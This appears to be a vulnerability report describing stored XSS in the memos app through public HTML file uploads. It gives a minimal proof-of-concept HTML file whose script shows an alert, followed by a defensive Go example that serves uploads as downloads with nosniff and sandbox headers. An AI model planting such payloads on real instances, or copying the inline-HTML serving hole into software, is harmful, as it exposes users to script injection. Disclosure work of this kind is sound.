memos allows users to upload a file and make it public to others. If the uploaded file is an HTML file with the content below, an XSS attack can occur.
// PoC.js
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
alert("warning");
</script>
</head>
<body>
</body>
</html>
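
One way to handle this on the serving side, shown as an added example in Go (it is not memos code and not the project's actual fix): choose response headers so that an uploaded HTML file is downloaded instead of rendered in the application's origin. The helper name `UploadHeaders` and the inline allowlist are assumptions made for this sketch.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
)

// inlineSafe is an assumed allowlist of media types that render without
// running script. text/html and image/svg+xml are left out on purpose.
var inlineSafe = map[string]bool{
	"image/png": true, "image/jpeg": true, "image/gif": true,
	"image/webp": true, "text/plain": true,
}

// UploadHeaders (hypothetical helper) returns the headers to send when
// serving a user-uploaded file with the stored Content-Type and file name.
func UploadHeaders(storedType, filename string) http.Header {
	h := http.Header{}
	// Stop the browser from sniffing an upload into text/html.
	h.Set("X-Content-Type-Options", "nosniff")
	// If the response is ever rendered as a document, scripts stay disabled.
	h.Set("Content-Security-Policy", "sandbox")

	// ParseMediaType lowercases the type and drops parameters such as charset.
	mediaType, _, err := mime.ParseMediaType(storedType)
	if err != nil {
		mediaType = "" // unparseable or missing type: treat as unsafe
	}
	name := map[string]string{"filename": filename}
	if inlineSafe[mediaType] {
		h.Set("Content-Type", mediaType)
		h.Set("Content-Disposition", mime.FormatMediaType("inline", name))
		return h
	}
	// Everything else, including HTML, is sent as an opaque download.
	h.Set("Content-Type", "application/octet-stream")
	h.Set("Content-Disposition", mime.FormatMediaType("attachment", name))
	return h
}

func main() {
	// Constructed sample inputs: stored Content-Type values of uploads.
	for _, t := range []string{"text/html; charset=utf-8", "image/png", "image/svg+xml", ""} {
		h := UploadHeaders(t, "PoC.html")
		fmt.Printf("%-28q -> %s | %s\n", t, h.Get("Content-Type"), h.Get("Content-Disposition"))
	}
}
```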